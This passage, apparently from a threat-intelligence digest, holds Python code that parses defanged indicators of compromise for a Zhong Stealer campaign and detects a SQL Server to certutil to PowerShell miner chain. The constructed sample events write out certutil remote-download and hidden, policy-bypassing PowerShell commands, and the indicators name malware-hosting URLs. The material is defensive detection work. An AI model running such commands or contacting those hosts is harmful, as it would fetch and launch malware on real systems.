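        out.ips.append((".".join(m.groups()[:4]), int(m.group(5)) if m.group(5) else None))
    elif section == "domain":
        v = value.lower()
        (out.domains if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", v) else out.errors).append(v)
    elif section == "url":
        (out.urls if re.match(r"https?://", value, re.I) else out.errors).append(value)
    elif section == "email":
        v = value.lower()
        (out.emails if re.fullmatch(r"[^@\s]+@[a-z0-9.-]+", v) else out.errors).append(v)

def _add_hashes(out: IocSet, rest: str) -> None:
    # A line may carry several algo=hex pairs for one file. A leading "- " is tolerated so the
    # flattened one-line form ("hash: - sha256=..., - sha256=...") parses too.
    for item in rest.split(","):
        item = item.strip().lstrip("- ").strip()
        if not item:
            continue
        algo, _, hexdigest = item.partition("=")
        algo, hexdigest = algo.strip().lower(), hexdigest.strip().lower()
        if HASH_LENGTHS.get(len(hexdigest)) == algo and re.fullmatch(r"[0-9a-f]+", hexdigest):
            out.hashes.append((algo, hexdigest))
        else:
            out.errors.append(item)   # wrong label, wrong length or non-hex: never ship it

def parse_ioc_block(text: str) -> IocSet:
    """Parse one 'Indicators of compromise' block: labelled ip:/domain:/url:/hash:/email: lines
    with comma-separated values, plus "- " continuation lines under hash:."""
    out, section = IocSet(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("---") or line.startswith("Indicators"):
            continue
        m = LABEL.match(line)
        if m:
            section, rest = m.group(1), m.group(2)
        elif section == "hash" and line.startswith("- "):
            rest = line[2:]
        else:
            continue   # unrecognised text is ignored, not guessed at
        if section == "hash":
            _add_hashes(out, rest)
        else:
            for item in rest.split(","):   # values in this format never contain commas
                if item.strip():
                    _add_value(out, section, refang(item))
    return out

# Copied from the Zhong Stealer entry above (still defanged, exactly as published).
ZHONG_BLOCK = """Indicators of compromise:
-------------------------
ip: 156[.]245[.]23[.]188, 47[.]79[.]64[.]228
domain: kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com
url: https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLogin[.]log, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/TASLoginBase[.]dll, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/down[.]exe, https://kkuu[.]oss-cn-hongkong[.]aliyuncs[.]com/ss/uu[.]txt
hash:
- sha256=1abffe97aafe9916b366da57458a78338598cab9742c2d9e03e4ad0ba11f29bf
- sha256=4eaebd93e23be3427d4c1349d64bef4b5fc455c93aebb9b5b752981e9266488e
- sha256=e46779869c6797b294cb097f47027a5c52466fd11112b6ccd52c569578d4b8cd
- sha1=ce120e922ed4156dbd07de8335c5a632974ec527, md5=778b6521dd2b07d7db0eaeaab9a2f86b, sha256=02244934046333f45bc22abe6185e6ddda033342836062afb681a583aa7d827f
email: zhongmaziil992@outlook[.]com
"""

# Constructed edge cases (not from any report): an ip:port pair, an impossible octet,
# the flattened one-line hash form, a truncated hash, and empty fields.
EDGE_BLOCK = """ip: 150[.]107[.]31[.]194:18000, 999[.]1[.]1[.]1
domain:
url:
hash: - sha256=deadbeef, - md5=778b6521dd2b07d7db0eaeaab9a2f86b
email:
"""
```

parse_ioc_block(ZHONG_BLOCK) yields two IPs, one domain, four URLs, six hashes (the last hash line contributes an sha1, an md5 and an sha256 for the same file) and one email with nothing rejected; parse_ioc_block(EDGE_BLOCK) keeps 150.107.31.194 with port 18000 and the md5, and reports "999.1.1.1" and "sha256=deadbeef" in errors. Review the errors list before loading anything downstream.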
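The PKT/Monero entry above describes a delivery chain built entirely from living-off-the-land components: SQL Server runs a shell, certutil downloads the miner, PowerShell launches it, and pkt.exe pegs the CPU. The detection logic below is an added example written for this digest, not code from Seqrite or RST Cloud. It assumes process-creation telemetry with Sysmon Event ID 1 style fields (Computer, ParentImage, Image, CommandLine); the sample events are constructed, 198.51.100.7 is a documentation address standing in for the real download host, and the file names are borrowed from the report's URLs only to make the sample recognisable. The per-event rules are deliberately narrow, and the correlation step is what turns them into a high-confidence alert: one certutil download on a workstation is noise, but SQL Server spawning a shell, a certutil download, evasive PowerShell flags and a known miner name on the same host is the chain.

```python
import re

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}
EVASIVE_PS = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:p|xecutionpolicy)\s+bypass|-enc(?:odedcommand)?\b", re.I)
MINER_NAME = re.compile(r"\b(?:pkt|packetcrypt|xmrig)(?:\.exe)?\b", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(ev: dict) -> list:
    """Return the names of every rule this process-creation event matches."""
    image, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    hits = []
    # xp_cmdshell-style abuse: the database engine itself spawns a shell or a download LOLBin.
    if parent == "sqlservr.exe" and image in SHELLS:
        hits.append("sqlserver_spawned_shell")
    # certutil fetching a remote payload (-urlcache plus a URL), the downloader seen in the report.
    if image == "certutil.exe" and re.search(r"-urlcache\b", cmd, re.I) and re.search(r"https?://", cmd, re.I):
        hits.append("certutil_download")
    if image in {"powershell.exe", "pwsh.exe"} and EVASIVE_PS.search(cmd):
        hits.append("powershell_evasive_flags")
    if MINER_NAME.search(image + " " + cmd):
        hits.append("known_miner_name")
    return hits

def scan(events):
    """[(index, [rule, ...])] for every event that matched at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev))]

def correlate(events):
    """Hosts on which two or more distinct rules fired; this is the alert worth paging on."""
    per_host = {}
    for ev in events:
        for rule in evaluate(ev):
            per_host.setdefault(ev.get("Computer", "?"), set()).add(rule)
    return {host: sorted(rules) for host, rules in per_host.items() if len(rules) >= 2}

# Constructed sample telemetry (not from the report). 198.51.100.7 is a documentation address.
SQLSRV = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
SYS32 = r"C:\Windows\System32"
PS = SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Computer": "SQL01", "ParentImage": SQLSRV, "Image": SYS32 + r"\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil -urlcache -f http://198.51.100.7/resources/img/pktw.png C:\Windows\Temp\pktw.png"},
    {"Computer": "SQL01", "ParentImage": SYS32 + r"\cmd.exe", "Image": SYS32 + r"\certutil.exe",
     "CommandLine": r"certutil -urlcache -f http://198.51.100.7/resources/img/pktw.png C:\Windows\Temp\pktw.png"},
    {"Computer": "SQL01", "ParentImage": SYS32 + r"\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -w hidden -ep bypass -File C:\Windows\Temp\info2R.txt"},
    {"Computer": "SQL01", "ParentImage": PS, "Image": r"C:\Windows\Temp\pkt.exe",
     "CommandLine": r"C:\Windows\Temp\pkt.exe --config C:\Windows\Temp\cfg.json"},
    # Benign activity on a workstation: certutil hashing a download, an interactive PowerShell.
    {"Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe", "Image": SYS32 + r"\certutil.exe",
     "CommandLine": r"certutil -hashfile C:\Users\alice\Downloads\setup.exe SHA256"},
    {"Computer": "WS01", "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell Get-Date"},
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(SAMPLE_EVENTS[i]["Computer"], basename(SAMPLE_EVENTS[i]["Image"]), hits)
    print("hosts with chain activity:", correlate(SAMPLE_EVENTS))
```

On the sample, the four SQL01 events each fire exactly one rule and the two WS01 events fire none, so correlate() returns SQL01 alone with all four rules. In production the same approach works over a SIEM query window; the parent-child rule is the one to keep even if the others are tuned away, because a production database engine has no legitimate reason to spawn certutil.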